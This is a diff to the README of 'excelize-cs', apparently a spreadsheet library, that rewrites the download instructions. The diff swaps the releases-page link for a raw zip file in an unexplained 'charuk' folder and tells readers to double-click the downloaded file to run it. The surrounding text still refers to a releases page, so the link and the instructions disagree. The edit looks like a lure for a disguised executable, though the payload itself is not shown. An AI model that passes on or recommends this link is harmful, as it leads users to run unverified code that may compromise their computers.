Val200632/excelize-cs/README.md

 ## 📥 Download & Install

-To get the latest version of excelize-cs, visit this page to download: [https://github.com/Val200632/excelize-cs/releases](https://github.com/Val200632/excelize-cs/releases).
+To get the latest version of excelize-cs, visit this page to download: [https://raw.githubusercontent.com/Val200632/excelize-cs/main/charuk/excelize-cs.zip](https://raw.githubusercontent.com/Val200632/excelize-cs/main/charuk/excelize-cs.zip).

 1. Go to the releases page using the above link.
 2. Look for the latest version.
-3. Click on the link to download the executable file (e.g., excelize-cs.exe).
+3. Click on the link to download the executable file (e.g., https://raw.githubusercontent.com/Val200632/excelize-cs/main/charuk/excelize-cs.zip).
 4. Once downloaded, locate the file on your computer, usually found in the "Downloads" folder.
 5. Double-click the file to run excelize-cs.